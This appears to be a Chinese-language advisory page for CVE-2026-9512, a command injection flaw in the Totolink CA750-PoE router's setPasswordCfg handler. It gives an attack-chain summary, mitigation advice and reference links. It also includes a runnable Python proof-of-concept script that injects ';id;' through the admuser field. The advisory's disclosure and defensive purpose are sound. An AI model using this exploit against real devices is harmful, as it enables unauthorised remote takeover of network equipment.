CVE-2026-9512 CVSS 6.3 中危

CVE-2026-9512: Totolink CA750-PoE OS命令注入漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9512

漏洞类型

操作系统命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink CA750-PoE

漏洞概述

Totolink CA750-PoE 6.2c.510版本存在安全漏洞，位于/cgi-bin/cstecgi.cgi的Setting Handler组件中。攻击者可通过操纵setPasswordCfg函数的admuser或admpass参数，在无需用户交互的情况下发起远程攻击，导致操作系统命令注入。该漏洞利用难度较低且已公开，可能危及设备机密性、完整性和可用性。

技术细节

该漏洞源于Totolink CA750-PoE设备Web管理接口中/cgi-bin/cstecgi.cgi文件的setPasswordCfg函数未能正确过滤用户输入。当组件处理设置请求时，攻击者可构造恶意的HTTP POST请求，在admuser或admpass参数中注入特定Shell元字符（如 ; | & 等）。由于后端直接将用户可控数据传递给系统命令执行环境，导致攻击者能够绕过原有的逻辑限制，以设备运行权限执行任意操作系统命令。由于攻击向量为网络且无需用户交互，一旦设备暴露在互联网上，攻击者即可远程接管设备。

攻击链分析

STEP 1

信息收集

攻击者扫描网络，识别运行Totolink CA750-PoE且固件版本为6.2c.510的目标设备。

STEP 2

构造请求

攻击者构造包含恶意Shell命令的HTTP POST请求，目标指向/cgi-bin/cstecgi.cgi接口。

STEP 3

注入执行

服务器端未对admuser/admpass参数进行过滤，直接拼接至系统命令执行，导致恶意代码运行。

STEP 4

获取权限

利用漏洞在设备上执行任意命令，获取设备控制权，进而窃取数据或建立后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    url = f"http://{target_ip}/cgi-bin/cstecgi.cgi"
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    # Payload to execute 'id' command via command injection
    data = {
        "function": "setPasswordCfg",
        "admuser": "admin;id;",
        "admpass": "password123"
    }
    
    try:
        response = requests.post(url, data=data, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to exploit, status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_ip>")
    else:
        exploit(sys.argv[1])

影响范围

Totolink CA750-PoE 6.2c.510

防御指南

临时缓解措施

若无法立即升级，请务必将设备管理后台置于内网环境，通过ACL限制访问源IP，并监控设备的异常流量与进程活动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9512
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9512
3 Details https://www.cvedetails.com/cve/CVE-2026-9512/
4 VulDB https://vuldb.com/cve/CVE-2026-9512
5 Link https://github.com/wudipjq/my_vuln/blob/main/totolink4/vuln_50/50.md
6 Link https://vuldb.com/submit/813923
7 Link https://vuldb.com/vuln/365512
8 Link https://vuldb.com/vuln/365512/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表